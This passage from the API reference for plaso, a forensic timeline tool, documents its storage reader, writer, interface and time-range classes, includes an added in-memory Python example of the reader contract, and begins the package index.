        Return type: StorageFile

    classmethod CreateStorageReaderForFile(path)
        Creates a storage reader based on the file.
        Parameters: path (str) – path to the storage file.
        Returns: a storage reader or None if the storage file cannot be opened or the storage format is not supported.
        Return type: StorageReader

    classmethod CreateStorageWriter(storage_format)
        Creates a storage writer.
        Parameters: storage_format (str) – storage format.
        Returns: a storage writer or None if the storage file cannot be opened or the storage format is not supported.
        Return type: StorageWriter

    classmethod CreateStorageWriterForFile(path)
        Creates a storage writer based on the file.
        Parameters: path (str) – path to the storage file.
        Returns: a storage writer or None if the storage file cannot be opened or the storage format is not supported.
        Return type: StorageWriter

    classmethod CreateTaskStorageReader(storage_format, task, path)
        Creates a task storage reader.
        Parameters:
            • storage_format (str) – storage format.
            • task (Task) – task the storage changes are part of.
            • path (str) – path to the storage file.
        Returns: a storage reader or None if the storage file cannot be opened or the storage format is not supported.
        Return type: StorageReader

    classmethod CreateTaskStorageWriter(storage_format)
        Creates a task storage writer.
        Parameters: storage_format (str) – storage format.
        Returns: a storage writer or None if the storage file cannot be opened or the storage format is not supported.
        Return type: StorageWriter

plaso.storage.identifiers module

Storage attribute container identifier objects.

class plaso.storage.identifiers.FakeIdentifier(sequence_number)
    Bases: plaso.containers.interface.AttributeContainerIdentifier
    Fake attribute container identifier intended for testing.

    sequence_number
        sequence number of the attribute container.
        Type: int

    CopyToString()
        Copies the identifier to a string representation.
        Returns: unique identifier or None.
        Return type: str

class plaso.storage.identifiers.RedisKeyIdentifier(name, sequence_number)
    Bases: plaso.containers.interface.AttributeContainerIdentifier
    Redis key attribute container identifier.

    name
        name of the attribute container.
        Type: str

    sequence_number
        sequence number of the attribute container.
        Type: int

    CopyToString()
        Copies the identifier to a string representation.
        Returns: unique identifier or None.
        Return type: str

class plaso.storage.identifiers.SQLTableIdentifier(name, sequence_number)
    Bases: plaso.containers.interface.AttributeContainerIdentifier
    SQL table attribute container identifier.
    The identifier is used to uniquely identify attribute containers. Where for example an attribute container is stored as JSON serialized data in a SQLite database file.

    name
        name of the table (attribute container).
        Type: str

    sequence_number
        sequence number of the attribute container.
        Type: int

    CopyToString()
        Copies the identifier to a string representation.
        Returns: unique identifier or None.
        Return type: str

    property row_identifier
        unique identifier of the row in the table.
        Type: int

plaso.storage.interface module

The attribute container store interface.

class plaso.storage.interface.BaseStore(storage_type='session')
    Bases: object
    Attribute container store interface.

    format_version
        storage format version.
        Type: int

    serialization_format
        serialization format.
        Type: str

    storage_type
        storage type.
        Type: str

    AddAttributeContainer(container)
        Adds a new attribute container.
        Parameters: container (AttributeContainer) – attribute container.
        Raises:
            • OSError – if the store cannot be written to.
            • IOError – if the store cannot be written to.

    abstract Close()
        Closes the store.

    abstract GetAttributeContainerByIdentifier(container_type, identifier)
        Retrieves a specific type of container with a specific identifier.
        Parameters:
            • container_type (str) – container type.
            • identifier (AttributeContainerIdentifier) – attribute container identifier.
        Returns: attribute container or None if not available.
        Return type: AttributeContainer
        Raises:
            • IOError – when the store is closed or if an unsupported identifier is provided.
            • OSError – when the store is closed or if an unsupported identifier is provided.

    abstract GetAttributeContainers(container_type)
        Retrieves a specific type of attribute containers.
        Parameters: container_type (str) – attribute container type.
        Returns: attribute container generator.
        Return type: generator(AttributeContainers)
        Raises:
            • IOError – when the store is closed.
            • OSError – when the store is closed.

    abstract GetEventTagByEventIdentifier(event_identifier)
        Retrieves the event tag related to a specific event identifier.
        Parameters: event_identifier (AttributeContainerIdentifier) – event.
        Returns: event tag or None if not available.
        Return type: EventTag
        Raises:
            • IOError – when the store is closed.
            • OSError – when the store is closed.

    abstract GetNumberOfAttributeContainers(container_type)
        Retrieves the number of a specific type of attribute containers.
        Parameters: container_type (str) – attribute container type.
        Returns: the number of containers of a specified type.
        Return type: int

    GetSessions()
        Retrieves the sessions.
        Yields: Session – session attribute container.
        Raises:
            • IOError – if there is a mismatch in session identifiers between the session start and completion attribute containers.
            • OSError – if there is a mismatch in session identifiers between the session start and completion attribute containers.

    abstract GetSortedEvents(time_range=None)
        Retrieves the events in increasing chronological order.
        This includes all events written to the store including those pending being flushed (written) to the store.
        Parameters: time_range (Optional[TimeRange]) – time range used to filter events that fall in a specific period.
        Yields: EventObject – event.

    abstract HasAttributeContainers(container_type)
        Determines if a store contains a specific type of attribute container.
        Parameters: container_type (str) – attribute container type.
        Returns: True if the store contains the specified type of attribute containers.
        Return type: bool

    abstract Open(**kwargs)
        Opens the store.

    SetSerializersProfiler(serializers_profiler)
        Sets the serializers profiler.
        Parameters: serializers_profiler (SerializersProfiler) – serializers profiler.

    SetStorageProfiler(storage_profiler)
        Sets the storage profiler.
        Parameters: storage_profiler (StorageProfiler) – storage profiler.

    UpdateAttributeContainer(container)
        Updates an existing attribute container.
        Parameters: container (AttributeContainer) – attribute container.
        Raises:
            • OSError – if the store cannot be written to.
            • IOError – if the store cannot be written to.

    WriteTaskCompletion(task_completion)
        Writes task completion information.
        Parameters: task_completion (TaskCompletion) – task completion information.
        Raises:
            • IOError – if the storage type does not support writing a task completion or if the store cannot be written to.
            • OSError – if the storage type does not support writing a task completion or if the store cannot be written to.

    WriteTaskStart(task_start)
        Writes task start information.
        Parameters: task_start (TaskStart) – task start information.
        Raises:
            • IOError – if the storage type does not support writing a task start or if the store cannot be written to.
            • OSError – if the storage type does not support writing a task start or if the store cannot be written to.

plaso.storage.logger module

The storage sub module logger.

plaso.storage.merge_reader module

The storage merge reader.

class plaso.storage.merge_reader.StorageMergeReader(session, storage_writer, task_storage_reader)
    Bases: object
    Storage reader for merging.

    number_of_containers
        number of containers merged in last call to MergeAttributeContainers.
        Type: int

    AddAttributeContainer(container)
        Adds an attribute container.
        Parameters: container (AttributeContainer) – attribute container.

    Close()
        Closes the merge reader.

    MergeAttributeContainers(maximum_number_of_containers=0)
        Reads attribute containers from a task store into the writer.
        Parameters: maximum_number_of_containers (Optional[int]) – maximum number of containers to merge, where 0 represents no limit.
        Returns: True if the entire task storage file has been merged.
        Return type: bool

plaso.storage.reader module

The storage reader.

class plaso.storage.reader.StorageReader
    Bases: object
    Storage reader interface.

    Close()
        Closes the storage reader.

    GetAttributeContainerByIdentifier(container_type, identifier)
        Retrieves a specific type of container with a specific identifier.
        Parameters:
            • container_type (str) – container type.
            • identifier (AttributeContainerIdentifier) – attribute container identifier.
        Returns: attribute container or None if not available.
        Return type: AttributeContainer

    GetAttributeContainers(container_type)
        Retrieves a specific type of attribute containers.
        Parameters: container_type (str) – attribute container type.
        Returns: attribute container generator.
        Return type: generator(AttributeContainers)

    GetFormatVersion()
        Retrieves the format version of the underlying storage file.
        Returns: the format version.
        Return type: int

    GetNumberOfAttributeContainers(container_type)
        Retrieves the number of a specific type of attribute containers.
        Parameters: container_type (str) – attribute container type.
        Returns: the number of containers of a specified type.
        Return type: int

    GetSerializationFormat()
        Retrieves the serialization format of the underlying storage file.
        Returns: the serialization format.
        Return type: str

    GetSessions()
        Retrieves the sessions.
        Returns: session generator.
        Return type: generator(Session)

    GetSortedEvents(time_range=None)
        Retrieves the events in increasing chronological order. This includes all events written to the storage including those pending being flushed (written) to the storage.

        Parameters: time_range (Optional[TimeRange]) – time range used to filter events that fall in a specific period.
        Returns: event generator.
        Return type: generator(EventObject)

    GetStorageType()
        Retrieves the storage type of the underlying storage file.
        Returns: the storage type.
        Return type: str

    HasAttributeContainers(container_type)
        Determines if a store contains a specific type of attribute container.
        Parameters: container_type (str) – attribute container type.
        Returns: True if the store contains the specified type of attribute containers.
        Return type: bool

    SetSerializersProfiler(serializers_profiler)
        Sets the serializers profiler.
        Parameters: serializers_profiler (SerializersProfiler) – serializers profiler.

    SetStorageProfiler(storage_profiler)
        Sets the storage profiler.
        Parameters: storage_profiler (StorageProfiler) – storage profiler.

    __enter__()
        Make usable with “with” statement.

    __exit__(exception_type, value, traceback)
        Make usable with “with” statement.

plaso.storage.time_range module

Storage time range objects.

class plaso.storage.time_range.TimeRange(start_timestamp, end_timestamp)
    Bases: object
    Date and time range. The timestamps are integers containing the number of microseconds since January 1, 1970, 00:00:00 UTC.

    duration
        duration of the range in microseconds.
        Type: int

    end_timestamp
        timestamp that marks the end of the range.
        Type: int

    start_timestamp
        timestamp that marks the start of the range.
        Type: int
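As an added example that is not plaso's own code, the block below implements the StorageReader and TimeRange contract documented above in memory: timestamps are integer microseconds since 1970-01-01 00:00:00 UTC, GetSortedEvents yields in increasing chronological order and includes events still pending a flush, and an optional TimeRange narrows the result. The inclusive range boundaries, the start-after-end check in TimeRange, the helper names (ToTimestamp, InMemoryStorageReader, DayRange, BuildSampleReader, DescribeSlice) and the sample events are assumptions of this example.

```python
"""Added example, not plaso's own code: an in-memory StorageReader/TimeRange."""
import heapq
from datetime import datetime, timezone


def ToTimestamp(date_time):
    """Converts an aware datetime to microseconds since 1970-01-01 00:00:00 UTC."""
    if date_time.tzinfo is None:
        raise ValueError('date_time must be time zone aware.')
    delta = date_time - datetime(1970, 1, 1, tzinfo=timezone.utc)
    return (delta.days * 86400 + delta.seconds) * 1000000 + delta.microseconds


class TimeRange(object):
    """Date and time range modelled on plaso.storage.time_range.TimeRange."""
    def __init__(self, start_timestamp, end_timestamp):
        # Assumption of this example: a start after the end is rejected.
        if start_timestamp > end_timestamp:
            raise ValueError('start_timestamp must not be after end_timestamp.')
        self.start_timestamp = start_timestamp
        self.end_timestamp = end_timestamp
        self.duration = end_timestamp - start_timestamp

    def Contains(self, timestamp):
        # Assumption of this example: both boundaries are inclusive.
        return self.start_timestamp <= timestamp <= self.end_timestamp


class Event(object):
    """Minimal stand-in for an EventObject: a timestamp and a description."""
    def __init__(self, timestamp, description):
        self.timestamp = timestamp
        self.description = description

    def __lt__(self, other):
        # Chronological ordering; the heap in GetSortedEvents relies on it.
        return self.timestamp < other.timestamp


class InMemoryStorageReader(object):
    """Reader exposing the StorageReader methods used here, backed by lists."""
    def __init__(self, written_events, pending_events=()):
        self._events = list(written_events)
        self._pending = list(pending_events)  # written but not yet flushed
        self._closed = False

    def __enter__(self):
        return self

    def __exit__(self, exception_type, value, traceback):
        self.Close()

    def Close(self):
        self._closed = True

    def GetNumberOfAttributeContainers(self, container_type):
        if container_type != 'event':
            return 0
        return len(self._events) + len(self._pending)

    def HasAttributeContainers(self, container_type):
        return self.GetNumberOfAttributeContainers(container_type) > 0

    def GetSortedEvents(self, time_range=None):
        """Yields events in increasing chronological order, pending ones included."""
        if self._closed:
            raise IOError('Storage reader is closed.')
        heap = []
        for event in self._events + self._pending:
            if time_range is None or time_range.Contains(event.timestamp):
                heapq.heappush(heap, event)
        while heap:
            yield heapq.heappop(heap)


def DayRange(year, month, day):
    """TimeRange covering one UTC calendar day, last microsecond included."""
    start = ToTimestamp(datetime(year, month, day, tzinfo=timezone.utc))
    return TimeRange(start, start + 86400 * 1000000 - 1)


def BuildSampleReader():
    """Constructed sample data: three written events, one still pending."""
    utc = timezone.utc
    written = [
        Event(ToTimestamp(datetime(2021, 6, 7, tzinfo=utc)), 'day after'),
        Event(ToTimestamp(datetime(2021, 6, 6, tzinfo=utc)), 'midnight'),
        Event(ToTimestamp(datetime(2021, 6, 5, 23, 59, 59, 999999, tzinfo=utc)),
              'just before')]
    pending = [Event(ToTimestamp(datetime(2021, 6, 6, 12, tzinfo=utc)), 'noon')]
    return InMemoryStorageReader(written, pending)


def DescribeSlice(reader, time_range=None):
    """Returns the descriptions of the events yielded for a time range."""
    return [event.description for event in reader.GetSortedEvents(time_range)]
```

Used in a `with` block, `DescribeSlice(reader, DayRange(2021, 6, 6))` returns `['midnight', 'noon']`: the pending noon event is included and the event one microsecond before midnight is excluded.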

plaso.storage.writer module

The storage writer.

class plaso.storage.writer.StorageWriter(storage_type='session')
    Bases: object
    Storage writer interface.

    AddAttributeContainer(container)
        Adds an attribute container.
        Parameters: container (AttributeContainer) – attribute container.
        Raises:
            • IOError – when the storage writer is closed.
            • OSError – when the storage writer is closed.

    AddOrUpdateEventTag(event_tag)
        Adds a new or updates an existing event tag.
        Parameters: event_tag (EventTag) – event tag.
        Raises:
            • IOError – when the storage writer is closed.
            • OSError – when the storage writer is closed.

    Close()
        Closes the storage writer.
        Raises:
            • IOError – when the storage writer is closed.
            • OSError – when the storage writer is closed.

    GetAttributeContainerByIdentifier(container_type, identifier)
        Retrieves a specific type of container with a specific identifier.
        Parameters:
            • container_type (str) – container type.
            • identifier (AttributeContainerIdentifier) – attribute container identifier.
        Returns: attribute container or None if not available.
        Return type: AttributeContainer
        Raises:
            • IOError – when the storage writer is closed.
            • OSError – when the storage writer is closed.

    GetAttributeContainerByIndex(container_type, index)
        Retrieves a specific attribute container.
        Parameters:
            • container_type (str) – attribute container type.
            • index (int) – attribute container index.
        Returns: attribute container or None if not available.

        Return type: AttributeContainer
        Raises:
            • IOError – when the storage writer is closed.
            • OSError – when the storage writer is closed.

    GetAttributeContainers(container_type)
        Retrieves a specific type of attribute containers.
        Parameters: container_type (str) – attribute container type.
        Returns: attribute container generator.
        Return type: generator(AttributeContainers)
        Raises:
            • IOError – when the storage writer is closed.
            • OSError – when the storage writer is closed.

    GetEvents()
        Retrieves the events.
        Returns: event generator.
        Return type: generator(EventObject)

    abstract GetFirstWrittenEventSource()
        Retrieves the first event source that was written after open. Using GetFirstWrittenEventSource and GetNextWrittenEventSource newly added event sources can be retrieved in order of addition.
        Returns: event source or None if there are no newly written ones.
        Return type: EventSource

    abstract GetNextWrittenEventSource()
        Retrieves the next event source that was written after open.
        Returns: event source or None if there are no newly written ones.
        Return type: EventSource

    GetSessions()
        Retrieves the sessions.
        Returns: session generator.
        Return type: generator(Session)

    GetSortedEvents(time_range=None)
        Retrieves the events in increasing chronological order. This includes all events written to the storage including those pending being flushed (written) to the storage.
        Parameters: time_range (Optional[TimeRange]) – time range used to filter events that fall in a specific period.
        Returns: event generator.
        Return type: generator(EventObject)

    abstract Open(**kwargs)
        Opens the storage writer.

    SetSerializersProfiler(serializers_profiler)
        Sets the serializers profiler.
        Parameters: serializers_profiler (SerializersProfiler) – serializers profiler.

    SetStorageProfiler(storage_profiler)
        Sets the storage profiler.
        Parameters: storage_profiler (StorageProfiler) – storage profiler.

    WriteSessionCompletion(session)
        Writes session completion information.
        Parameters: session (Session) – session the storage changes are part of.
        Raises:
            • IOError – when the storage writer is closed or if the storage type is not supported.
            • OSError – when the storage writer is closed or if the storage type is not supported.

    WriteSessionConfiguration(session)
        Writes session configuration information.
        Parameters: session (Session) – session the storage changes are part of.
        Raises:
            • IOError – when the storage writer is closed or if the storage type is not supported.
            • OSError – when the storage writer is closed or if the storage type is not supported.

    WriteSessionStart(session)
        Writes session start information.
        Parameters: session (Session) – session the storage changes are part of.
        Raises:
            • IOError – when the storage writer is closed or if the storage type is not supported.
            • OSError – when the storage writer is closed or if the storage type is not supported.

    WriteTaskCompletion(task)
        Writes task completion information.
        Parameters: task (Task) – task.
        Raises:
            • IOError – when the storage writer is closed or if the storage type is not supported.
            • OSError – when the storage writer is closed or if the storage type is not supported.

    WriteTaskStart(task)
        Writes task start information.
        Parameters: task (Task) – task.
        Raises:
            • IOError – when the storage writer is closed or if the storage type is not supported.
            • OSError – when the storage writer is closed or if the storage type is not supported.

    property number_of_analysis_reports
        number of analysis reports written.
        Type: int

    property number_of_analysis_warnings
        number of analysis warnings written.
        Type: int

    property number_of_event_sources
        number of event sources written.
        Type: int

    property number_of_event_tags
        number of event tags written.
        Type: int

    property number_of_events
        number of events written.
        Type: int

    property number_of_extraction_warnings
        number of extraction warnings written.
        Type: int

    property number_of_preprocessing_warnings
        number of preprocessing warnings written.
        Type: int

    property number_of_recovery_warnings
        number of recovery warnings written.
        Type: int

Module contents

5.1.16 plaso.unix package

Module contents

5.1.17 plaso.winnt package

Submodules

plaso.winnt.known_folder_ids module

This file contains the Windows NT Known Folder identifier definitions.

plaso.winnt.language_ids module

This file contains the Windows NT Language identifiers.

plaso.winnt.shell_folder_ids module

This file contains the Windows NT shell folder identifier definitions.

plaso.winnt.time_zones module

This file contains the Windows NT time zone definitions. The Windows time zone names can be obtained from the following Windows Registry key:

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones

The list below is based on time zone definitions from:
    * Windows 2000
    * Windows 2003
    * Windows 2008
    * Windows 2012
    * Windows 7
    * Windows 8
    * Windows 8.1
    * Windows 10
    * Windows XP
and utils/generate_windows_time_zones.py.

Module contents

5.2 Submodules

5.3 plaso.dependencies module

Functionality to check for the availability and version of dependencies. This file is generated by l2tdevtools update-dependencies.py; any dependency related changes should be made in dependencies.ini.

plaso.dependencies.CheckDependencies(verbose_output=True)
    Checks the availability of the dependencies.
    Parameters: verbose_output (Optional[bool]) – True if output should be verbose.
    Returns: True if the dependencies are available, False otherwise.
    Return type: bool

5.4 Module contents

Super timeline all the things (Plaso Langar Að Safna Öllu). log2timeline is a tool designed to extract timestamps from various files found on a typical computer system(s) and aggregate them. Plaso is the Python rewrite of log2timeline.

(plaso.engine.knowledge_base.KnowledgeBase AddOutputOptions() (plaso.cli.tool_options.OutputModuleOptions method), 131 method), 92 AddWindowsEventLogProvider() AddPathSegment() (plaso.filters.path_filter.PathFilterScanTreeNode(plaso.preprocessors.mediator.PreprocessMediator method), 165 method), 475 AddPerformanceOptions() agent (plaso.parsers.mac_appfirewall.MacAppFirewallLogEventData (plaso.cli.extraction_tool.ExtractionTool attribute), 385 method), 83 agent (plaso.parsers.mac_wifi.MacWifiLogEventData AddProcessingOptions() attribute), 391 (plaso.cli.extraction_tool.ExtractionTool agent (plaso.parsers.sqlite_plugins.ls_quarantine.LsQuarantineEventData method), 83 attribute), 281 AddProcessingOptions() AirportPlugin (class in (plaso.cli.psort_tool.PsortTool method), plaso.parsers.plist_plugins.airport), 232 87 ALL_PLUGINS (plaso.parsers.interface.BaseParser address (plaso.parsers.sqlite_plugins.android_sms.AndroidSMSEventDataattribute), 382 attribute), 243 ALL_PLUGINS (plaso.parsers.manager.ParsersManager address (plaso.parsers.symantec.SymantecEventData attribute), 393 attribute), 436 allowed (plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCEntry address (plaso.parsers.syslog_plugins.ssh.SSHEventData attribute), 291 attribute), 317 AMCacheFileEventData (class in AddRow() (plaso.cli.views.BaseTableView method), 95 plaso.parsers.winreg_plugins.amcache), AddRow() (plaso.cli.views.CLITableView method), 96 318


AMCachePlugin (class in plaso.parsers.winreg_plugins.amcache), 319
AMCacheProgramEventData (class in plaso.parsers.winreg_plugins.amcache), 319
analyses_performed (plaso.analysis.hash_tagging.HashAnalyzer attribute), 41
analyses_performed (plaso.analysis.nsrlsvr.NsrlsvrAnalyzer attribute), 47
analysis_counter (plaso.containers.reports.AnalysisReport attribute), 111
analysis_reports_counter (plaso.containers.sessions.Session attribute), 112
analysis_reports_counter (plaso.containers.sessions.SessionCompletion attribute), 114
AnalysisMediator (class in plaso.analysis.mediator), 45
AnalysisMultiProcessEngine (class in plaso.multi_process.analysis_engine), 186
AnalysisPlugin (class in plaso.analysis.interface), 43
AnalysisPluginManager (class in plaso.analysis.manager), 44
AnalysisPluginOptions (class in plaso.cli.tool_options), 92
AnalysisPluginsArgumentsHelper (class in plaso.cli.helpers.analysis_plugins), 62
AnalysisProcess (class in plaso.multi_process.analysis_process), 187
AnalysisReport (class in plaso.containers.reports), 111
AnalysisTool (class in plaso.cli.analysis_tool), 82
AnalysisWarning (class in plaso.containers.warnings), 120
Analyze() (plaso.analysis.hash_tagging.HashAnalyzer method), 41
Analyze() (plaso.analysis.hash_tagging.HTTPHashAnalyzer method), 40
Analyze() (plaso.analysis.nsrlsvr.NsrlsvrAnalyzer method), 47
Analyze() (plaso.analysis.viper.ViperAnalyzer method), 50
Analyze() (plaso.analysis.virustotal.VirusTotalAnalyzer method), 52
Analyze() (plaso.analyzers.hashing_analyzer.HashingAnalyzer method), 59
Analyze() (plaso.analyzers.interface.BaseAnalyzer method), 59
Analyze() (plaso.analyzers.yara_analyzer.YaraAnalyzer method), 61
AnalyzeEvents() (plaso.cli.psteal_tool.PstealTool method), 88
AnalyzeEvents() (plaso.multi_process.analysis_engine.AnalysisMultiProcessEngine method), 186
analyzer_name (plaso.containers.analyzer_result.AnalyzerResult attribute), 97
AnalyzerResult (class in plaso.containers.analyzer_result), 97
AnalyzersManager (class in plaso.analyzers.manager), 60
AnalyzersProfiler (class in plaso.engine.profilers), 145
AndFilter (class in plaso.filters.filters), 160
AndroidAppUsageEventData (class in plaso.parsers.android_app_usage), 352
AndroidAppUsageParser (class in plaso.parsers.android_app_usage), 352
AndroidCallEventData (class in plaso.parsers.sqlite_plugins.android_calls), 240
AndroidCallPlugin (class in plaso.parsers.sqlite_plugins.android_calls), 240
AndroidSMSEventData (class in plaso.parsers.sqlite_plugins.android_sms), 243
AndroidSMSPlugin (class in plaso.parsers.sqlite_plugins.android_sms), 243
AndroidWebViewCacheEventData (class in plaso.parsers.sqlite_plugins.android_webviewcache), 246
AndroidWebViewCachePlugin (class in plaso.parsers.sqlite_plugins.android_webviewcache), 246
ApacheAccessEventData (class in plaso.parsers.apache_access), 353
ApacheAccessParser (class in plaso.parsers.apache_access), 353
api_name (plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityEventData attribute), 251
app_version (plaso.parsers.czip_plugins.oxml.OpenXMLEventData attribute), 217
app_version (plaso.parsers.sqlite_plugins.appusage.MacOSApplicationUsageEventData attribute), 248
AppCompatCacheCachedEntry (class in plaso.parsers.winreg_plugins.appcompatcache), 321
AppCompatCacheEventData (class in plaso.parsers.winreg_plugins.appcompatcache), 321
AppCompatCacheHeader (class in plaso.parsers.winreg_plugins.appcompatcache), 321
AppCompatCacheWindowsRegistryPlugin (class in plaso.parsers.winreg_plugins.appcompatcache), 321


appearance (plaso.parsers.santa.SantaMountEventData attribute), 422
Append() (plaso.lib.bufferlib.CircularBuffer method), 178
AppendToParserChain() (plaso.parsers.mediator.ParserMediator method), 397
AppleAccountPlugin (class in plaso.parsers.plist_plugins.appleaccount), 232
application (plaso.parsers.cups_ipp.CupsIppEventData attribute), 365
application (plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventData attribute), 224
application (plaso.parsers.esedb_plugins.srum.SRUMNetworkConnectivityUsageEventData attribute), 226
application (plaso.parsers.esedb_plugins.srum.SRUMNetworkDataUsageEventData attribute), 226
application (plaso.parsers.sqlite_plugins.appusage.MacOSApplicationUsageEventData attribute), 248
application (plaso.parsers.winjob.WinJobEventData attribute), 460
application (plaso.parsers.winreg_plugins.winlogon.WinlogonEventData attribute), 350
application_display_name (plaso.parsers.sqlite_plugins.windows_timeline.WindowsTimelineGenericEventData attribute), 311
application_focus_count (plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryEventData attribute), 349
application_focus_duration (plaso.parsers.winreg_plugins.userassist.UserAssistWindowsRegistryEventData attribute), 349
application_name (plaso.parsers.trendmicroav.TrendMicroUrlEventData attribute), 450
ApplicationUsagePlugin (class in plaso.parsers.sqlite_plugins.appusage), 247
APTHistoryLogEventData (class in plaso.parsers.apt_history), 355
APTHistoryLogParser (class in plaso.parsers.apt_history), 355
arg_url (plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityEventData attribute), 251
args (plaso.filters.expressions.Expression attribute), 156
args (plaso.filters.filters.Filter attribute), 161
args (plaso.parsers.sqlite_plugins.chrome_extension_activity.ChromeExtensionActivityEventData attribute), 251
ArgumentHelperManager (class in plaso.cli.helpers.manager), 70
ArgumentsHelper (class in plaso.cli.helpers.interface), 69
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.interface.ArtifactPreprocessorPlugin attribute), 469
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.linux.LinuxDistributionPlugin attribute), 471
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.linux.LinuxHostnamePlugin attribute), 471
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.linux.LinuxIssueFilePlugin attribute), 471
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.linux.LinuxStandardBaseReleasePlugin attribute), 471
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.linux.LinuxSystemdOperatingSystemPlugin attribute), 471
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.linux.LinuxTimeZonePlugin attribute), 471
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.linux.LinuxUserAccountsPlugin attribute), 472
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.macos.MacOSHostnamePlugin attribute), 472
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.macos.MacOSKeyboardLayoutPlugin attribute), 472
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.macos.MacOSSystemVersionPlugin attribute), 472
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.macos.MacOSTimeZonePlugin attribute), 472
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.macos.MacOSUserAccountsPlugin attribute), 472
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.windows.WindowsAllUsersProfileEnvironmentVariablePlugin attribute), 476
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.windows.WindowsAvailableTimeZonesPlugin attribute), 476
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.windows.WindowsCodepagePlugin attribute), 476
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.windows.WindowsEventLogProvidersPlugin attribute), 476
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.windows.WindowsHostnamePlugin attribute), 476
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.windows.WindowsProgramDataEnvironmentVariablePlugin attribute), 476


ARTIFACT_DEFINITION_NAME (plaso.preprocessors.windows.WindowsProgramFilesEnvironmentVariablePlugin attribute), 477
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.windows.WindowsProgramFilesX86EnvironmentVariablePlugin attribute), 477
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.windows.WindowsSystemProductPlugin attribute), 477
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.windows.WindowsSystemRootEnvironmentVariablePlugin attribute), 477
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.windows.WindowsSystemVersionPlugin attribute), 477
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.windows.WindowsTimeZonePlugin attribute), 477
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.windows.WindowsUserAccountsPlugin attribute), 477
ARTIFACT_DEFINITION_NAME (plaso.preprocessors.windows.WindowsWinDirEnvironmentVariablePlugin attribute), 477
artifact_filters (plaso.containers.sessions.Session attribute), 112
artifact_filters (plaso.containers.sessions.SessionConfiguration attribute), 114
artifact_filters (plaso.engine.configurations.ProcessingConfiguration attribute), 124
ArtifactAttributeContainer (class in plaso.containers.artifacts), 98
ArtifactDefinitionsArgumentsHelper (class in plaso.cli.helpers.artifact_definitions), 63
ArtifactDefinitionsFiltersHelper (class in plaso.engine.artifact_filters), 122
ArtifactFiltersArgumentsHelper (class in plaso.cli.helpers.artifact_filters), 63
ArtifactPreprocessorPlugin (class in plaso.preprocessors.interface), 469
ASLEventData (class in plaso.parsers.asl), 356
ASLFileEventData (class in plaso.parsers.asl), 357
ASLParser (class in plaso.parsers.asl), 357
attachment_location (plaso.parsers.sqlite_plugins.imessage.IMessageEventData attribute), 273
attribute (plaso.filters.expressions.Expression attribute), 156, 157
attribute_data_type (plaso.parsers.mac_keychain.KeychainDatabaseColumn attribute), 387
attribute_identifier (plaso.parsers.mac_keychain.KeychainDatabaseColumn attribute), 387
ATTRIBUTE_NAME (plaso.analyzers.hashers.entropy.EntropyHasher attribute), 55
ATTRIBUTE_NAME (plaso.analyzers.hashers.interface.BaseHasher attribute), 55
ATTRIBUTE_NAME (plaso.analyzers.hashers.md5.MD5Hasher attribute), 57
ATTRIBUTE_NAME (plaso.analyzers.hashers.sha1.SHA1Hasher attribute), 58
ATTRIBUTE_NAME (plaso.analyzers.hashers.sha256.SHA256Hasher attribute), 58
attribute_name (plaso.containers.analyzer_result.AnalyzerResult attribute), 97
attribute_name (plaso.parsers.mac_keychain.KeychainDatabaseColumn attribute), 387
attribute_type (plaso.parsers.ntfs.NTFSFileStatEventData attribute), 404
attribute_value (plaso.containers.analyzer_result.AnalyzerResult attribute), 97
AttributeContainer (class in plaso.containers.interface), 108
AttributeContainerIdentifier (class in plaso.containers.interface), 109
AttributeContainerSerializer (class in plaso.serializer.interface), 478
AttributeContainersManager (class in plaso.containers.manager), 109
attributes (plaso.parsers.spotlight_storedb.SpotlightStoreMetadataItem attribute), 433
audit_type (plaso.parsers.selinux.SELinuxLogEventData attribute), 426
authentication_method (plaso.parsers.syslog_plugins.ssh.SSHEventData attribute), 317
author (plaso.parsers.czip_plugins.oxml.OpenXMLEventData attribute), 217
author_identifier (plaso.parsers.sqlite_plugins.twitter_android.TwitterAndroidStatusEventData attribute), 307
AutomaticDestinationsDestListEntryEventData (class in plaso.parsers.olecf_plugins.automatic_destinations), 228
AutomaticDestinationsOLECFPlugin (class in plaso.parsers.olecf_plugins.automatic_destinations), 229
AutoRunsPlugin (class in plaso.parsers.winreg_plugins.run), 338
available_time_zones (plaso.containers.artifacts.SystemConfigurationArtifact attribute), 101
available_time_zones (plaso.engine.knowledge_base.KnowledgeBase property), 134

B

background_bytes_read (plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventData attribute), 224
background_bytes_written (plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventData attribute), 224
background_context_switches (plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventData attribute), 224
background_cycle_time (plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventData attribute), 225
background_number_for_flushes (plaso.parsers.esedb_plugins.srum.SRUMApplicationResourceUsageEventData attribute), 225
